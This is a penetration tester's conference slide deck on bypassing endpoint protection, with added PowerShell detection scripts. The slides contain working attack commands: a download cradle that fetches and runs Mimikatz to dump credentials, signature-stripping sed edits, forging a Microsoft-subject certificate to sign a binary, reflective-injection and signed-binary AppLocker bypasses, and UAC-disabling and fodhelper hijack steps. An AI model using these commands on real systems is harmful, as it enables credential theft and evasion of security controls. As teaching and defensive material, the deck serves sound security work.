Endpoint is not enough
Uploaded by sumedt-jitpukdebodin, category: Technology
Endpoint protection is not enough.
By Sumedt Jitpukdebodin
LPIC-1, NCLA, Comptia Security+, C|EHv6, eCPPT, IWSS, CPTE, GIAC GPEN, OSCP
# wHoAmi
• Name: Sumedt Jitpukdebodin
• Job: Security Consultant @ G-ABLE,
• Non-profit job: OWASP Thailand, 2600Thailand
• Hobbies: hacking, digital forensics, malware analysis, programming; excited about many security fields.
• My work: www.techsuii.com, and the book ก้าวแรกสู่นักทดสอบเจาะระบบ (First Steps to Becoming a Penetration Tester)
• Another: Reconnaissance Me.
Objective
• Statistics
• Endpoint Protection
• Bypassing
Statistics
Malware Statistics
Distribution of malware under Windows in 2016
TOP 10 file extensions malware Q1 2017
Endpoint Protection
What is Endpoint Protection?
• Endpoint security, or endpoint protection, is an approach to protecting computer networks that are remotely bridged to client devices. Connecting laptops, tablets, mobile phones and other wireless devices to corporate networks creates attack paths for security threats.
Why we use Endpoint Protection
How Antivirus works
• Based on heuristic
• Based on signature
• Based on cloud
Evasion Techniques
• Anti-security techniques (Avoid detection)
• Anti-sandbox techniques (Avoid automatic analysis)
• Anti-analyst techniques (Avoid analysis)
Anti-security techniques
• Obfuscation
• Crypter
• Packer
• FUD (Fully UnDetectable by antimalware)
• etc.
Frameworks for generating AV-bypassing malware
• Veil
• TheFatRat
• Winpayloads
• Dr0p1t-Framework
• Avet
• VBad
• Obfuscated Empire
• OWASP-ZSC
• etc.
Invoke-Mimikatz
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
Just a Mimikatz
• sed -i -e 's/Invoke-Mimikatz/Invoke-redpill2017/g' redpill2017.ps1
• sed -i -e '/<#/,/#>/c\\' redpill2017.ps1
• sed -i -e 's/^[[:space:]]*#.*$//g' redpill2017.ps1
• sed -i -e 's/DumpCreds/DumpCred/g' redpill2017.ps1
• sed -i -e 's/ArgumentPtr/NotTodayPal/g' redpill2017.ps1
• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' redpill2017.ps1
• sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" redpill2017.ps1
Show time (1)
Invoke-redpill2017
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.3:9000/redpill2017.ps1'); Invoke-redpill2017 -DumpCred"
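The "Just a Mimikatz" slide strips comments and renames Invoke-Mimikatz, which defeats a signature keyed on the function name (the "based on signature" model from the antivirus slide) but leaves the Win32 API usage untouched. The PowerShell below is an added example, not part of the deck, showing the check a defender gets from looking at content rather than names: it scores script text on name-independent indicators and applies the same scoring to PowerShell script block log events (Event ID 4104), which record the script after the IEX download cradle on the slide above has fetched and expanded it. The indicator list, the threshold and the sample script are constructed for illustration; the sample is not functional code.

```powershell
# Added example, not from the deck: a name-independent content check for
# scripts like the renamed Mimikatz on the slide. Indicator list, threshold
# and sample are constructed for illustration; tune them before real use.

# API names and loader idioms that a reflective PE loader cannot easily rename
# away, unlike the function name and comments that the sed commands rewrite.
$Indicators = @(
    'VirtualAlloc', 'VirtualProtect', 'WriteProcessMemory', 'CreateRemoteThread',
    'OpenProcess', 'LoadLibrary', 'GetProcAddress', 'DllImport',
    'Marshal]::Copy', 'FromBase64String', 'DownloadString', 'Invoke-Expression', 'IEX',
    'sekurlsa', 'lsass'
)

function Get-ScriptIndicatorHits {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Content)
    # Case-insensitive literal match per indicator; returns the distinct hits.
    $hits = foreach ($i in $Indicators) {
        if ($Content.IndexOf($i, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) { $i }
    }
    @($hits)
}

function Test-SuspiciousScript {
    param([string]$Content, [int]$Threshold = 4)
    $hits = Get-ScriptIndicatorHits -Content $Content
    [pscustomobject]@{
        HitCount   = $hits.Count
        Hits       = ($hits -join ', ')
        Suspicious = ($hits.Count -ge $Threshold)
    }
}

function Get-ScriptBlockLogHits {
    # Event 4104 (script block logging) holds the script text as it ran, so the
    # download cradle's payload is visible here even though it never hit disk.
    param([int]$MaxEvents = 200)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $r = Test-SuspiciousScript -Content $_.Message
            if ($r.Suspicious) {
                [pscustomobject]@{ Time = $_.TimeCreated; HitCount = $r.HitCount; Hits = $r.Hits }
            }
        }
}

# Constructed sample (not working code): function renamed, comments removed,
# API usage intact, as after the sed commands on the slide.
$Sample = @'
function Invoke-redpill2017 {
    param([switch]$DumpCred)
    $VirtualAlloc = Get-ProcAddress kernel32.dll VirtualAlloc
    $WriteProcessMemory = Get-ProcAddress kernel32.dll WriteProcessMemory
    $CreateRemoteThread = Get-ProcAddress kernel32.dll CreateRemoteThread
    [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $Addr, $PEBytes.Length)
}
'@

Test-SuspiciousScript -Content $Sample
```

On the constructed sample four indicators hit (VirtualAlloc, WriteProcessMemory, CreateRemoteThread and Marshal]::Copy), so the renamed script is still flagged, whereas a signature on the string "Invoke-Mimikatz" would miss it. Get-ScriptBlockLogHits only returns events if script block logging is enabled through the "Turn on PowerShell Script Block Logging" policy.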
Sign malware with fake certificate
• osslsigncode verify <microsoft exe>
• openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation"
• osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem -out evil_signed.exe
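The openssl command above produces a self-signed certificate whose subject merely claims to be Microsoft. As an added example (not from the deck), the PowerShell below reports on an executable's signature the way a defender should read it: whether the chain terminates in a root the machine trusts, and whether a Microsoft subject is backed by such a chain. It relies only on Get-AuthenticodeSignature and the .NET X509Chain class; the subject regex, the NoCheck revocation setting and the notepad.exe path used for the demonstration are this example's own choices.

```powershell
# Added example, not from the deck: judge a signature by its chain, not its
# subject. A self-signed certificate can carry any subject string, so
# "O=Microsoft Corporation" proves nothing on its own. Get-AuthenticodeSignature
# reports Valid only when the chain ends in a root the machine trusts.

function Get-SignerReport {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $cert = $sig.SignerCertificate            # $null when the file is not signed
    $subject      = $null
    $rootSubject  = $null
    $chainTrusted = $false

    if ($cert) {
        $subject = $cert.Subject
        $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
        $chain.ChainPolicy.RevocationMode = 'NoCheck'   # keep the check offline
        $chainTrusted = $chain.Build($cert)
        # The last element is the root the chain terminated in, trusted or not.
        $rootSubject = $chain.ChainElements[$chain.ChainElements.Count - 1].Certificate.Subject
    }

    $claimsMicrosoft = [bool]$cert -and ($subject -match 'O=Microsoft Corporation')

    [pscustomobject]@{
        Path            = $Path
        Status          = $sig.Status
        StatusMessage   = $sig.StatusMessage
        Subject         = $subject
        RootSubject     = $rootSubject
        ChainTrusted    = $chainTrusted
        ClaimsMicrosoft = $claimsMicrosoft
        # The case the slide describes: a Microsoft subject with no trusted chain.
        SubjectSpoofed  = $claimsMicrosoft -and ($sig.Status -ne 'Valid')
    }
}

function Find-SpoofedSigners {
    # Sweep a directory for binaries whose subject claims Microsoft but whose
    # chain does not hold up.
    param([Parameter(Mandatory)][string]$Directory)
    Get-ChildItem -Path $Directory -Include *.exe, *.dll -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object { Get-SignerReport -Path $_.FullName } |
        Where-Object { $_.SubjectSpoofed }
}

# Demonstration on a Windows binary; a genuine Microsoft chain reports Valid.
Get-SignerReport -Path "$env:WINDIR\System32\notepad.exe" | Format-List
```

A file signed with the certificate from the slide comes back with Status other than Valid (the chain terminates in an untrusted root) while ClaimsMicrosoft is true, which is exactly the SubjectSpoofed combination; any control that only inspects the subject string would be satisfied by it.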
But running an EXE is so hard…
Try indirect ways
• Macro
• VBS
• DLL
• HTA (HTML Application)
• PS1
• etc.
Example of HTA with vbscript
Show time (2)
AppLocker
• Application whitelisting
• Covers executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers
• Windows 7 and later
• Single computer (secpol.msc) or Group Policy Management (gpmc.msc)
AppLocker File Types
• Executables: regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.)
• Windows Installer files (.msi, .msp, .mst), typically used to install new software on the machine
• Script files with the extensions .ps1, .vbs, .vba, .cmd and .js
• Packaged apps installed through the Microsoft Store
• DLL files (.dll and .ocx, in the Advanced tab)
AppLocker Rule
• Execution Path
• Publisher Information
• File Hash
Bypass AppLocker
• Find an exception path (a directory the default rules still allow)
• "C:\Windows\Tasks"
• "C:\Windows\tracing"
• Load the file from memory (PowerSploit's Invoke-ReflectivePEInjection)
• $ByteArray = [System.IO.File]::ReadAllBytes("C:\users\richard\desktop\mimikatz.exe");
• Invoke-Expression (Get-Content .\Invoke-ReflectivePEInjection.ps1 | Out-String)
• Invoke-ReflectivePEInjection -PEBytes $ByteArray
• Obfuscate the exe so its hash no longer matches a hash rule
• PowerShell without powershell.exe (Casey Smith, PowerShell Empire) and StarFighter
• Registry key manipulation
• Run the PE file via a Microsoft-signed tool
• C:\windows\system32\rundll32.exe
• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe (installs and uninstalls applications from the command prompt)
• C:\Windows\System32\regsvr32.exe (registers and unregisters DLL files)
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (builds projects where Visual Studio is not installed)
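The first bypass on this slide works because the default AppLocker rules allow everything under %WINDIR% while a few directories there (Tasks and tracing on the slide) are writable by standard users. The PowerShell below is an added example, not part of the deck, that audits for this: it walks the Windows directory for user-writable subdirectories, flattens the effective AppLocker path rules, and lists the writable directories that no Deny path rule covers. It assumes Windows PowerShell 5.1 or later with the built-in AppLocker module; the identity list, the recursion depth and the write-bit mask are this example's choices.

```powershell
# Added example, not from the deck: audit for the AppLocker gap described on
# the slide. Any directory under %WINDIR% that a standard user can write to is
# a place where the default allow rule still lets unknown code run; each one
# should be matched by an explicit Deny path rule.

$LowPrivIdentities = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE'
)
# CreateFiles (write a file) and AppendData (create a subdirectory) are the bits
# that matter; Modify and FullControl both include them.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData)

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Find-WritableWindowsDirs {
    # C:\Windows\Tasks and C:\Windows\tracing are the two the slide names; this
    # walks the tree so that any other writable directory shows up as well.
    param([string]$Root = $env:WINDIR, [int]$Depth = 2)
    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
        Where-Object { Test-LowPrivWritable -Path $_.FullName } |
        Select-Object -ExpandProperty FullName
}

function Get-AppLockerPathRules {
    # Flatten the effective policy's path rules, expanding %WINDIR% so that the
    # rule paths compare against real directory names.
    if (-not (Get-Command Get-AppLockerPolicy -ErrorAction SilentlyContinue)) { return }
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    foreach ($rc in $policy.AppLockerPolicy.RuleCollection) {
        foreach ($rule in $rc.FilePathRule) {
            [pscustomobject]@{
                Collection  = $rc.Type
                Enforcement = $rc.EnforcementMode
                Action      = $rule.Action
                Path        = $rule.Conditions.FilePathCondition.Path -replace '(?i)%WINDIR%', $env:WINDIR
            }
        }
    }
}

function Find-UncoveredWritableDirs {
    # Writable directories under %WINDIR% that no Deny path rule covers.
    $denyPrefixes = @(Get-AppLockerPathRules | Where-Object { $_.Action -eq 'Deny' } |
                      ForEach-Object { $_.Path.TrimEnd('*').TrimEnd('\') })
    foreach ($dir in Find-WritableWindowsDirs) {
        $covered = $false
        foreach ($prefix in $denyPrefixes) {
            if ($dir.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) { $covered = $true; break }
        }
        if (-not $covered) { $dir }
    }
}

# Report whether each collection is enforcing rather than only auditing, then
# the writable directories that still lack a Deny rule.
Get-AppLockerPathRules | Select-Object Collection, Enforcement -Unique
Find-UncoveredWritableDirs
```

Every path the audit prints is a candidate for a Deny rule in the Exe, Script and DLL collections. The signed Microsoft tools listed at the end of the slide are the other half of the picture: they pass publisher and path rules by design, so the usual complement is a Deny rule on those binaries for non-administrative users together with the DLL collection enabled, since otherwise a DLL loaded by rundll32.exe or regsvr32.exe is never evaluated.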
Show time (3)
UAC
• User Account Control (UAC)
• Runs with standard user rights instead of full administrator rights
• Disable UAC (EnableLUA=0): C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
• Enable UAC (EnableLUA=1): C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
Bypass UAC
• Exploit a mistake in any autoElevate binary (use sigcheck to check the autoElevate manifest flag)
• UACMe
• DLL hijacking
• autoElevate
• Elevated COM interface
• SDCLT: the backup command with a specific option
• Fodhelper: Manage Optional Features
• Process or DLL injection into a process signed with the Windows Publisher certificate
• Windows Update Standalone Installer (wusa.exe)
• etc.
Bypass UAC with Fodhelper
• Fodhelper.exe (%WINDIR%\System32\fodhelper.exe)
• Missing registry key
• HKCU:\Software\Classes\ms-settings\shell\open\command
• HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
• HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
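As an added example (not from the deck), the PowerShell below covers the UAC and fodhelper slides from the defender's side: it reads the UAC values that the two reg.exe commands on the UAC slide toggle, and checks every loaded user hive for the ms-settings\shell\open\command key that the fodhelper bypass depends on. On a clean system that key does not exist, so its presence with a command value is a strong indicator. The interpretation of ConsentPromptBehaviorAdmin and the Remove-MsSettingsHijack helper are this example's choices.

```powershell
# Added example, not from the deck: audit UAC settings and detect the
# ms-settings handler hijack used by the fodhelper bypass. Per-user Classes
# keys live in the HKEY_USERS\<SID>_Classes hive; HKCU\Software\Classes is a
# view of it, so enumerating HKEY_USERS covers every logged-on user.

function Get-UacPosture {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA                   # 1 = UAC on, 0 = off
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin  # 2 = always notify, 5 = default
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        # autoElevate binaries such as fodhelper elevate silently only below "always notify".
        AutoElevatePossible        = ($p.EnableLUA -eq 1) -and ($p.ConsentPromptBehaviorAdmin -ne 2)
    }
}

function Find-MsSettingsHijack {
    $suffix = 'ms-settings\shell\open\command'
    $candidates = foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS') {
        if ($hive.Name -like '*_Classes') { "Registry::$($hive.Name)\$suffix" }
        else                              { "Registry::$($hive.Name)\Software\Classes\$suffix" }
    }
    foreach ($key in $candidates) {
        if (Test-Path -LiteralPath $key) {
            $props = Get-ItemProperty -LiteralPath $key
            [pscustomobject]@{
                Key             = $key
                Command         = $props.'(default)'      # what fodhelper.exe would launch elevated
                DelegateExecute = $props.DelegateExecute  # empty value forces the (default) command
            }
        }
    }
}

function Remove-MsSettingsHijack {
    # Removes the whole ms-settings key for each hit; supports -WhatIf.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($hit in Find-MsSettingsHijack) {
        $root = $hit.Key -replace '\\shell\\open\\command$', ''
        if ($PSCmdlet.ShouldProcess($root, 'Remove hijacked ms-settings handler')) {
            Remove-Item -LiteralPath $root -Recurse -Force
        }
    }
}

Get-UacPosture
Find-MsSettingsHijack
```

Because the key is written to the user's own hive, creating it needs no privilege and no disk artifact, which is why a registry check (or a Sysmon registry event on that path) is the practical detection; raising UAC to "always notify" (ConsentPromptBehaviorAdmin = 2) is the setting that stops fodhelper.exe from auto-elevating in the first place.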
The last show time (4)
Protecting against malware
• People: security awareness training; always keep yourself up to date.
• Process: restrict program installation and usage by policy, updates, backups, governance, intelligence, an incident response plan, and more => security team
• Technology: technology supports the team and the processes
• Backup
• Antivirus
• Anti-ransomware
• Endpoint detection
Q & A
Resources
• https://www.blackhillsinfosec.com/?p=5555
• https://github.com/nccgroup/Winpayloads
• https://www.youtube.com/watch?v=6bUoz5ChTOs
• https://github.com/D4Vinci/Dr0p1t-Framework
• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf
• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
• https://github.com/Pepitoh/VBad
• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros
• https://twitter.com/Andrew___Morris/status/879712530041626627
• https://github.com/cobbr/ObfuscatedEmpire
• https://pentestlab.blog/tag/uac/
• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
• https://www.greyhathacker.net/?p=796
• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189
• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques
• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting
• https://github.com/api0cradle/UltimateAppLockerByPassList
• https://offsec.provadys.com/UAC-bypass-dotnet.html